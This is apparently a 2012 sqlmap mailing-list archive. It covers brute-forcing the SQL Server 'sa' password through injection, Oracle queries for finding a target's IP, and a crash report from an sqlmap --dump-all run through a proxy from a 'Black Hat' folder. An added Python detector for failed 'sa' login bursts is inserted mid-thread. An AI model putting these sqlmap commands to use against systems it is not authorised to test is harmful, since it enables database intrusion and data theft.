> However, OPENROWSET is enabled by default on MSSQL 2000. From MSSQL 2005 RTM it is disabled by thereforce, hence either the database administrator has manually enabled it, or you won't be able to abuse this function to brute-force the 'sa' (DBA) password hash or run statements on his behalf.
>
> [1] http://sqlninja.sourceforge.net
> [2] https://github.com/sqlmapproject/sqlmap/issues/31
> [3] https://github.com/sqlmapproject/sqlmap/issues/34
>
> Regards,
> Bernardo
>
> On 20 July 2012 12:14, juan molina <j.m...@gm...> wrote:
> > Is there a way to brute-force the SA password using SQL INJECTION?
> >
> > This is the scenario. It is a database server (SQL Server 2008) without access to the internet (it has the 1433 port blocked), the current user is a normal user (low-privileged user). Cannot get the SA password hash.
> >
> > The question is, is there any tool or code or way to brute-force the SA password without direct access to the SQL Server?
> >
> > It is a request to add this functionality to SQLMAP, I don't know if it is possible.
> >
> > Thanks.
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobile: +447788962949 (UK 07788962949) |
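Seen from the database side, the guessing loop discussed in the two posts above produces a tight run of "Login failed for user 'sa'" events, which the following added example flags; it is not code from the thread, sqlmap or sqlninja. The error-log layout, the client addresses, the thresholds and all function names are assumptions, and the log lines are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed layout: "<date> <time>.<frac> Logon <message> [CLIENT: <addr>]".
FAILED = re.compile(
    r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\.\d+\s+Logon\s+"
    r"Login failed for user '([^']*)'\..*\[CLIENT: ([^\]]+)\]")


def parse(line):
    """Return (timestamp, login, client) for a failed-login line, else None."""
    m = FAILED.match(line)
    if m is None:
        return None
    return datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S"), m.group(2), m.group(3)


def find_bursts(lines, login="sa", threshold=10, window=timedelta(seconds=60)):
    """Map client -> time the threshold was first reached inside the window.

    Lines are expected in chronological order, as in an error log.
    """
    recent = defaultdict(deque)
    flagged = {}
    for line in lines:
        event = parse(line)
        if event is None or event[1].lower() != login:
            continue
        ts, _, client = event
        seen = recent[client]
        seen.append(ts)
        while ts - seen[0] > window:   # drop failures older than the window
            seen.popleft()
        if len(seen) >= threshold:
            flagged.setdefault(client, ts)
    return flagged


def constructed_log():
    """Constructed sample: a 36-guess loop among unrelated failures."""
    fmt = ("%s.00 Logon       Login failed for user '%s'. Reason: Password "
           "did not match that for the login provided. [CLIENT: %s]")
    base = datetime(2012, 7, 24, 13, 26, 36)
    # An operator mistyping the sa password, and one other login failing.
    events = [(-300, "sa", "10.0.0.5"), (-100, "sa", "10.0.0.5"),
              (200, "sa", "10.0.0.5"), (210, "webapp", "10.0.0.9")]
    # One guess per character of a 36-character alphabet, within 3 seconds.
    events += [(i // 12, "sa", "10.0.0.7") for i in range(36)]
    events.sort(key=lambda e: e[0])
    lines = ["2012-07-24 13:20:00.00 Server      constructed non-login line"]
    for seconds, login, client in events:
        stamp = (base + timedelta(seconds=seconds)).strftime("%Y-%m-%d %H:%M:%S")
        lines.append(fmt % (stamp, login, client))
    return lines
```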
From: Zaki A. <zak...@gm...> - 2012-07-24 05:51:23
|
On Mon, Jul 16, 2012 at 11:20 PM, Bernardo Damele A. G. <ber...@gm...> wrote:

> Zaki,
>
> Recently we added switch --hostname to retrieve the database server hostname. There's no built-in switch to retrieve the IP yet.

Hi Bernardo,

Actually Miroslav had answered my question:

<quote>
Hi Zaki.

You can try either [1][2]:

1) --sql-query="SELECT UTL_INADDR.GET_HOST_ADDRESS() FROM DUAL"
or
2) --sql-query="SELECT SYS_CONTEXT('USERENV', 'IP_ADDRESS', 15) FROM DUAL"

...but don't hope too much because of execute privileges [3]

Also, try to use those with --parse-errors to possibly catch some DBMS error information

Kind regards,
Miroslav Stampar

References:
[1] http://www.dba-oracle.com/t_get_ip_address_utl_inaddr_sys_context.htm
[2] http://docs.oracle.com/cd/B19306_01/appdev.102/b14258/u_inaddr.htm
[3] https://forums.oracle.com/forums/thread.jspa?messageID=9755122
</quote>

Did the --hostname option implement those sql-query statements?

Regards,

--
Zaki Akhmad |
From: Bernardo D. A. G. <ber...@gm...> - 2012-07-22 19:58:19
|
Dusan,

you are running a year and a half outdated version of sqlmap. Run the following command:

$ git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

and try your run again from sqlmap-dev directory.

Bernardo

On 22 July 2012 20:52, Dusan Lauko <dus...@gm...> wrote:

> [20:02:09] [CRITICAL] unhandled exception in sqlmap/0.9, retry your run with the latest development version from the Subversion repository. If the exception persists, please send by e-mail to sql...@li... the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 0.9 (r3630)
> Python version: 2.7.2
> Operating system: nt
> Command line: D:\Anon Hacking\Black Hat\SQLi\SQLmap\SQLmap\sqlmap.py --proxy=http://186.215.202.163:8080 -u ********************************************************************* --random-agent --dump-all --exclude-sysdb --eta
> Technique: ERROR
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
>   File "D:\Anon Hacking\Black Hat\SQLi\SQLmap\SQLmap\sqlmap.py", line 82, in main
>     start()
>   File "D:\Anon Hacking\Black Hat\SQLi\SQLmap\SQLmap\lib\controller\controller.py", line 447, in start
>     action()
>   File "D:\Anon Hacking\Black Hat\SQLi\SQLmap\SQLmap\lib\controller\action.py", line 106, in action
>     conf.dbmsHandler.dumpAll()
>   File "D:\Anon Hacking\Black Hat\SQLi\SQLmap\SQLmap\plugins\generic\enumeration.py", line 1496, in dumpAll
>     data = self.dumpTable()
>   File "D:\Anon Hacking\Black Hat\SQLi\SQLmap\SQLmap\plugins\generic\enumeration.py", line 1275, in dumpTable
>     colString = ", ".join(column for column in colList)
> TypeError: sequence item 1: expected string or Unicode, NoneType found
>
> [*] shutting down at: 20:02:09

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949) |